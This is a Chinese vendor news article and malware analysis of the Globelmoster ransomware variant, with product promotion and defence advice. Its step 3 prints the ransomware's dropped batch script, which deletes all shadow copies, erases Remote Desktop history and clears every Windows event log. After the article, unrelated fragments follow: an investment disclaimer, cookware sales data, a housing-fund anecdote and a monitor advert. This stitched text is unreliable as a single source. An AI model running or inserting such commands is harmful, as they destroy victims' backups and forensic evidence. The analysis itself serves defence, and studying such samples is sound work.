2017年7月19日,国内网友在安全论坛上反馈,自己的服务器中了勒索病毒,所有的文件均被加密,文件后缀名被修改为“skunk”。经瑞星安全专家调查分析发现是感染了Ransom.Globelmoster勒索病毒。
瑞星安全人员表示,此病毒早在7月10日便已收录进瑞星病毒库,瑞星所有安全产品只要将版本升级到最新便可对其拦截。同时,作为全球首创的可以拦截已知和未知勒索病毒的“瑞星之剑”无需升级便可直接对其进行拦截。
瑞星安全人员介绍,此次网友反馈的勒索病毒事件可能是用户的服务器存在漏洞或是弱口令,被黑客拿到了管理员权限,然后植入该病毒。因此,广大企业用户应谨慎对待,避免遭受勒索病毒攻击。可在服务器中安装瑞星之剑,既可以防御病毒攻击,同时不会对服务器造成任何影响。
“瑞星之剑”是瑞星全球首创针对已知与未知勒索病毒的防御软件,既不影响正常工作又不影响系统性能,用户无需进行关闭系统正常服务端口、打补丁、开启防火墙等操作,便可实现全防御的效果,可供广大政府、企业和有定制化业务系统的用户直接使用。
“Globelmoster”勒索病毒变种详细分析
1、病毒运行后从资源中解密出加密生成文件的后缀名,和提示文件名
2、将自身拷贝到%appdata%\Microsoft\SystemCertificates\My\Certificates\目录中
3、释放批处理文件并执行
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
4、结束指定进程
5、跳过指定路径不加密
6、全盘加密文件
7、生成提示页面
8、总结
论坛用户反馈的病毒样本就为一存粹加密器,没有感染模块。用户服务器中毒有可能是服务器上面存在漏洞或者弱口令,被黑客种植该样本勒索。
9、防御方法
自查服务器,看服务器上面提供的服务是否存在漏洞,服务器系统补丁保持更新,定期修改管理员账号密码,安装瑞星之剑和防病毒软件定期扫描病毒。
文章内容仅供阅读,不构成投资建议,请谨慎对待。投资者据此操作,风险自担。
奥维云网(AVC)推总数据显示,2024年1-9月明火炊具线上零售额94.2亿元,同比增加3.1%,其中抖音渠道表现优异,同比有14%的涨幅,传统电商略有下滑,同比降低2.3%。
“以前都要去窗口办,一套流程下来都要半个月了,现在方便多了!”打开“重庆公积金”微信小程序,按照提示流程提交相关材料,仅几秒钟,重庆市民曾某的账户就打进了21600元。
华硕ProArt创艺27 Pro PA279CRV显示器,凭借其优秀的性能配置和精准的色彩呈现能力,为您的创作工作带来实质性的帮助,双十一期间低至2799元,性价比很高,简直是创作者们的首选。